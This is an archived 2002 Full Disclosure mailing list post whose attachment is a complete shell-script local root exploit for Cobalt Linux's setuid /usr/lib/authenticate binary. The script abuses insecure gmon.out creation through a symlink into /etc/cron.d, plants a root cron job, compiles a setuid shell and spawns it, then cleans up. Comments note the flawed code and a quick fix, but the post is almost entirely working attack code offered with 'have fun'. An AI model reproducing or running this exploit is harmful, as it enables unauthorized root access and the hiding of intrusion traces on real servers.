Full Disclosure mailing list archives
Cobalt Linux Apache Local Root Exploit
From: full-disclosure () lists netsys com (Charles Stevenson)
Date: Tue, 20 Aug 2002 14:33:47 -0600
--4SFOXa2GPu3tIq4H Content-Type: multipart/mixed; boundary="jRHKVT23PllUwdXP" Content-Disposition: inline --jRHKVT23PllUwdXP Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable I've been sitting on this a while but what the hell... have fun. peace, core --=20 Charles Stevenson (core) <core () bokeoa com> Lab Assistant, College of Eastern Utah San Juan Campus=20 http://www.bokeoa.com/~core/core.asc --jRHKVT23PllUwdXP Content-Type: application/x-sh Content-Disposition: attachment; filename="RaQFuCK.sh" Content-Transfer-Encoding: quoted-printable #!/bin/sh=0A#=0A# Cobalt Linux 6.0 Local Root Exploit=0A#=0A# Effects: <=3D= apache-1.3.20-RaQ4_1C3 (AFAIK all Cobalt Linux Apache ;)=0A# Quick Fix: su= - root -c "chmod 755 /usr/lib/authenticate"=0A#=0A# Problem Source Code:= =0A# fd =3D open("gmon.out", O_WRONLY|O_CREAT|O_TRUNC, 0666);=0A#=0A# Sugge= sted Code:=0A# fd =3D mkstemp("/tmp/gmon.out-XXXXXX");=0A# =0A# Still need = help Cobalt developers? Ok:=0A# man 3 tmpfile; man 2 open; echo "Thanks cor= e"=0A#=0A# by Charles Stevenson <core () bokeoa com>=0A#=0A# Fri Jun 28 03:35:= 53 MDT 2002=0A# - initial version=0A# Sun Jul 7 20:12:41 MDT 2002=0A# - ad= ded some features for robustness=0A=0Aecho "RaQFuCK.sh by core"=0A=0Atarget= =3D"/usr/lib/authenticate"=0Atempdir=3D"/tmp"=0A=0Aif [ -u /.sushi ] ; then= =0A exec /.sushi=0Afi=0A=0Aprintf "Checking for $target..."=0Aif [ -f "= $target" ] ; then =0A echo "done."=0Aelse=0A echo "NO!"=0A exit 1= =0Afi=0A=0Aprintf "Checking if $target is setuid root..."=0Aif [ -u "$targe= t" ] ; then =0A echo "done."=0Aelse=0A echo "NO! Hrm... does this adm= in have a clue???"=0A exit 1=0Afi=0A=0Aif [ ! -d "$tempdir/core" ]; then= =0A printf "Creating $tempdir/core..."=0A if ! mkdir "$tempdir/core" = 2>/dev/null ; then=0A echo "FAILED!" ; exit 1=0A fi=0A echo "done."= =0Afi=0A=0Aprintf "Changing directory to $tempdir/core..."=0Aif ! cd "$temp= dir/core" 2>/dev/null ; then =0A echo "FAILED!" ; exit 1=0Aelse=0A ec= ho "done."=0Afi=0A=0Aprintf "Creating cron.d symlink..."=0Aif ! ln -fs /etc= /cron.d/core gmon.out 2>/dev/null; then=0A echo "FAILED!" ; exit 1=0Aels= e=0A echo "done."=0Afi=0A=0Aprintf "Changing umask..."=0Aif ! umask 000 = ; then=0A echo "FAILED!" ; exit 1=0Aelse=0A echo "done."=0Afi=0A=0Apr= intf "Compiling root shell..."=0Acat >sushi.c <<EOF=0A#include <unistd.h>= =0Aint main (int argc, char **argv, char **envp) {=0A setuid(0); =0A = setgid(0); =0A execve("/bin/sh",argv,envp);=0A return -1;=0A}=0AEOF= =0Aif ! cc sushi.c -o sushi 2>/dev/null; then=0A echo "FAILED!" ; exit 1= =0Aelse=0A echo "done."=0Afi=0A=0Aprintf "Compiling cron takeover..."=0A= cat >takeover.c <<EOF=0A#include <stdlib.h>=0Amain() { system("cp $tempdir/= core/sushi /.sushi ; chmod 6777 /.sushi"); }=0AEOF=0Aif ! cc takeover.c -o = own 2>/dev/null; then=0A echo "FAILED!" ; exit 1=0Afi=0Aecho "done."=0A= =0Aprintf "Performing symlink attack..."=0Aprintf "\n\n\n\n" | "$target"=0A= if [ -u /etc/cron.d/core ] ; then=0A echo "SYMLINK ATTACK FAILED!" && ex= it 1=0Aelse =0A echo "done."=0Afi=0A=0Aprintf "Setting up evil cron job.= .."=0Acat >croncore <<EOF=0A*/1 * * * * root if [ -x "$tempdir/core/own" ] = ; then "$tempdir/core/own"; fi=0AEOF=0Aif ! cat croncore 2>/dev/null >/etc/= cron.d/core; then=0A echo "FAILED!" ; exit 1=0Aelse=0A echo "done."= =0Afi=0A=0Aprintf "Waiting for root shell"=0Awhile [ ! -u /.sushi ] ; do=0A= sleep 1 ; printf "."=0Adone=0Aecho "done."=0A=0Acd /=0A=0Aprintf "Clean= ing up real quick..."=0Aif ! /.sushi -c "rm -rf $tempdir/core /etc/cron.d/c= ore"; then=0A echo "FAILED??? Fuck it!"=0Aelse=0A echo "done."=0Afi= =0A=0Aecho "Spawning root shell!!! God Damn! I say GOD DAMN!!"=0Aif ! exec = /.sushi -i; then=0A echo "Exec Failed!!! BUMMER!" ; exit 1=0Afi=0A --jRHKVT23PllUwdXP-- --4SFOXa2GPu3tIq4H Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.7 (GNU/Linux) iD8DBQE9YqeqGAuLrxOyeJMRAkglAKCkNh5xxnIrJYZlPLkRQ9XoXa2YFwCg23jN XXrrMfFJ1nJtxgfzjK5Ds9w= =IzJX -----END PGP SIGNATURE----- --4SFOXa2GPu3tIq4H--
Current thread:
- Cobalt Linux Apache Local Root Exploit Charles Stevenson (Aug 20)
- Cobalt Linux Apache Local Root Exploit Ka (Aug 20)
- Cobalt Linux Apache Local Root Exploit Charles Stevenson (Aug 20)
- Cobalt Linux Apache Local Root Exploit Ka (Aug 20)